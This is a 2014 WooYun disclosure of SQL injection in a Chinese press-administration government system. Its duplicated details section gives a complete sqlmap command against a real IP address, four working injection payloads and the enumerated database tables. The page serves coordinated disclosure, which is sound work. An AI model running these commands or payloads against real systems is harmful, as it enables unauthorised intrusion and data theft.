当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053919

漏洞标题:中华人民共和国新闻出版总署某系统SQL注射

相关厂商:ppsc.gov.cn

漏洞作者: lxj616

提交时间:2014-03-18 14:40

修复时间:2014-05-02 14:41

公开时间:2014-05-02 14:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-18: 细节已通知厂商并且等待厂商处理中
2014-03-25: 厂商已经确认,细节仅向厂商公开
2014-04-04: 细节向核心白帽子及相关领域专家公开
2014-04-14: 细节向普通白帽子公开
2014-04-24: 细节向实习白帽子公开
2014-05-02: 细节向公众公开

简要描述:

中华人民共和国新闻出版总署 某系统SQL注射
SQLMAP 验证(仅获取数据表名称,不再继续深入)

详细说明:

http://www.ppsc.gov.cn/logon.aspx?ReturnUrl=%2fDefault.aspx

normal1.png


点击“查询单位号”

normal2.png


然后抓包 SQLMAP

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "124.42.45.165:8086/CorporationSelect.aspx" --data="__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X%2BX8e3a793WZnC7yA%3D&__EVENTVALIDATION=%2FwEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7%2FegDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7%2FegDQLD75egDQLR7%2BugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql%2Bb4Bo&txtName=%E4%BA%BA%E6%B0%91%E5%87%BA%E7%89%88%E7%A4%BE&ddlType=TS&btnSelect=%E6%9F%A5%E8%AF%A2" -p txtName --tables


sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Place: POST
Parameter: txtName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社' AND 1380=1380 AND 'cXJF'='cXJF&ddlType=TS&btnSelect=查询
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=-5158' UNION ALL SELECT CHAR(58)+CHAR(120)+CHAR(111)+CHAR(113)+CHAR(58)+CHAR(84)+CHAR(88)+CHAR(71)+CHAR(100)+CHAR(70)+CHAR(106)+CHAR(116)+CHAR(120)+CHAR(121)+CHAR(107)+CHAR(58)+CHAR(117)+CHAR(110)+CHAR(115)+CHAR(58)-- &ddlType=TS&btnSelect=查询
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社'; WAITFOR DELAY '0:0:5';--&ddlType=TS&btnSelect=查询
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社' WAITFOR DELAY '0:0:5'--&ddlType=TS&btnSelect=查询
---
Database: News2
[72 tables]
+---------------------------------------------------------+
| dbo.AgentAudit                                          |
| dbo.AgentFillOut                                        |
| dbo.AreaCode                                            |
| dbo.AuditGuideLine                                      |
| dbo.AuditTask                                           |
| dbo.AuditTaskCorp                                       |
| dbo.AuditTaskTargetStatus                               |
| dbo.BussinessFillOutCycle                               |
| dbo.BussinessModel                                      |
| dbo.BussinessType                                       |
| dbo.CIPType                                             |
| dbo.CWBB                                                |
| dbo.CWBBTYPE                                            |
| dbo.CWBBTYPE_BNB                                        |
| dbo.CWBB_TB_TBMX                                        |
| dbo.CW_CODE_TEMP_2012                                   |
| dbo.CorpAuditBussiness                                  |
| dbo.CorpAuditContactPerson                              |
| dbo.CorpBookPrefix                                      |
| dbo.CorpBussiness                                       |
| dbo.CorpCharacter                                       |
| dbo.CorpContactPerson                                   |
| dbo.CorpElectronPrefix                                  |
| dbo.CorpGroupType                                       |
| dbo.CorpLanguage                                        |
| dbo.CorpMagazine                                        |
| dbo.CorpManageMode                                      |
| dbo.CorpManageType                                      |
| dbo.CorpNewPropertyType                                 |
| dbo.CorpNewsPaper                                       |
| dbo.CorpPropertyValues                                  |
| dbo.CorpRegisterType                                    |
| dbo.CorpSamplingValues                                  |
| dbo.CorpSystemType                                      |
| dbo.CorpVideoPrefix                                     |
| dbo.Corporation                                         |
| dbo.CorporationAudit                                    |
| dbo.CorporationKind                                     |
| dbo.FillOutYearTask                                     |
| dbo.LanguageType                                        |
| dbo.MagazineType                                        |
| dbo.NewspaperLevel                                      |
| dbo.NewspaperType                                       |
| dbo.NewspaperYearCheckType                              |
| dbo.PubUserReg                                          |
| dbo.RPT_CWBB                                            |
| dbo.RPT_CWBB_ONE                                        |
| dbo.RPT_CWBB_ZB                                         |
| dbo.ReportModel                                         |
| dbo.RoleType                                            |
| dbo.SamplingCase                                        |
| dbo.SeachFilter                                         |
| dbo.Survey1                                             |
| dbo.Survey2                                             |
| dbo.Survey4                                             |
| dbo.SurveyBalance                                       |
| dbo.SurveyParams                                        |
| dbo.SurveyReportModel                                   |
| dbo.TAB1                                                |
| dbo.UserRegister                                        |
| dbo.UserRoleBussiness                                   |
| dbo.VIEW_CWBB_SUM                                       |
| dbo.VIEW_RPT_CWBB                                       |
| dbo.ViewBussinessFillOutCycleIn2013                     |
| dbo.ViewCorpBussiness                                   |
| dbo.bussinessbasedata                                   |
| dbo.deleteFrom                                          |
| dbo.dwid                                                |
| dbo.sysdiagrams                                         |
| dbo.view_survey1_areacode                               |
| dbo.view_survey2_areacode                               |
| dbo.yqbb                                                |
+---------------------------------------------------------+
Database: tempdb
[5 tables]
+---------------------------------------------------------+
| dbo.[#112DC535]                                         |
| dbo.[#1221E96E]                                         |
| dbo.[#13160DA7]                                         |
| dbo.[#24616091]                                         |
| dbo.[#307231BB]                                         |
+---------------------------------------------------------+
Database: master
[360 tables]
+---------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS                    |
| INFORMATION_SCHEMA.COLUMNS                              |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE                  |

漏洞证明:

normal2.png


然后抓包 SQLMAP

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "124.42.45.165:8086/CorporationSelect.aspx" --data="__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X%2BX8e3a793WZnC7yA%3D&__EVENTVALIDATION=%2FwEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7%2FegDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7%2FegDQLD75egDQLR7%2BugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql%2Bb4Bo&txtName=%E4%BA%BA%E6%B0%91%E5%87%BA%E7%89%88%E7%A4%BE&ddlType=TS&btnSelect=%E6%9F%A5%E8%AF%A2" -p txtName --tables


sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Place: POST
Parameter: txtName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社' AND 1380=1380 AND 'cXJF'='cXJF&ddlType=TS&btnSelect=查询
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=-5158' UNION ALL SELECT CHAR(58)+CHAR(120)+CHAR(111)+CHAR(113)+CHAR(58)+CHAR(84)+CHAR(88)+CHAR(71)+CHAR(100)+CHAR(70)+CHAR(106)+CHAR(116)+CHAR(120)+CHAR(121)+CHAR(107)+CHAR(58)+CHAR(117)+CHAR(110)+CHAR(115)+CHAR(58)-- &ddlType=TS&btnSelect=查询
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社'; WAITFOR DELAY '0:0:5';--&ddlType=TS&btnSelect=查询
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社' WAITFOR DELAY '0:0:5'--&ddlType=TS&btnSelect=查询
---
Database: News2
[72 tables]
+---------------------------------------------------------+
| dbo.AgentAudit                                          |
| dbo.AgentFillOut                                        |
| dbo.AreaCode                                            |
| dbo.AuditGuideLine                                      |
| dbo.AuditTask                                           |
| dbo.AuditTaskCorp                                       |
| dbo.AuditTaskTargetStatus                               |
| dbo.BussinessFillOutCycle                               |
| dbo.BussinessModel                                      |
| dbo.BussinessType                                       |
| dbo.CIPType                                             |
| dbo.CWBB                                                |
| dbo.CWBBTYPE                                            |
| dbo.CWBBTYPE_BNB                                        |
| dbo.CWBB_TB_TBMX                                        |
| dbo.CW_CODE_TEMP_2012                                   |
| dbo.CorpAuditBussiness                                  |
| dbo.CorpAuditContactPerson                              |
| dbo.CorpBookPrefix                                      |
| dbo.CorpBussiness                                       |
| dbo.CorpCharacter                                       |
| dbo.CorpContactPerson                                   |
| dbo.CorpElectronPrefix                                  |
| dbo.CorpGroupType                                       |
| dbo.CorpLanguage                                        |
| dbo.CorpMagazine                                        |
| dbo.CorpManageMode                                      |
| dbo.CorpManageType                                      |
| dbo.CorpNewPropertyType                                 |
| dbo.CorpNewsPaper                                       |
| dbo.CorpPropertyValues                                  |
| dbo.CorpRegisterType                                    |
| dbo.CorpSamplingValues                                  |
| dbo.CorpSystemType                                      |
| dbo.CorpVideoPrefix                                     |
| dbo.Corporation                                         |
| dbo.CorporationAudit                                    |
| dbo.CorporationKind                                     |
| dbo.FillOutYearTask                                     |
| dbo.LanguageType                                        |
| dbo.MagazineType                                        |
| dbo.NewspaperLevel                                      |
| dbo.NewspaperType                                       |
| dbo.NewspaperYearCheckType                              |
| dbo.PubUserReg                                          |
| dbo.RPT_CWBB                                            |
| dbo.RPT_CWBB_ONE                                        |
| dbo.RPT_CWBB_ZB                                         |
| dbo.ReportModel                                         |
| dbo.RoleType                                            |
| dbo.SamplingCase                                        |
| dbo.SeachFilter                                         |
| dbo.Survey1                                             |
| dbo.Survey2                                             |
| dbo.Survey4                                             |
| dbo.SurveyBalance                                       |
| dbo.SurveyParams                                        |
| dbo.SurveyReportModel                                   |
| dbo.TAB1                                                |
| dbo.UserRegister                                        |
| dbo.UserRoleBussiness                                   |
| dbo.VIEW_CWBB_SUM                                       |
| dbo.VIEW_RPT_CWBB                                       |
| dbo.ViewBussinessFillOutCycleIn2013                     |
| dbo.ViewCorpBussiness                                   |
| dbo.bussinessbasedata                                   |
| dbo.deleteFrom                                          |
| dbo.dwid                                                |
| dbo.sysdiagrams                                         |
| dbo.view_survey1_areacode                               |
| dbo.view_survey2_areacode                               |
| dbo.yqbb                                                |
+---------------------------------------------------------+
Database: tempdb
[5 tables]
+---------------------------------------------------------+
| dbo.[#112DC535]                                         |
| dbo.[#1221E96E]                                         |
| dbo.[#13160DA7]                                         |
| dbo.[#24616091]                                         |
| dbo.[#307231BB]                                         |
+---------------------------------------------------------+
Database: master
[360 tables]
+---------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS                    |
| INFORMATION_SCHEMA.COLUMNS                              |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE                  |

修复方案:

过滤

版权声明:转载请注明来源 lxj616@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-03-25 23:14

厂商回复:

CNVD确认并复现所述情况,转由CNCERT向国家上级信息安全协调机构上报,由其后续通报网站管理单位。

最新状态:

暂无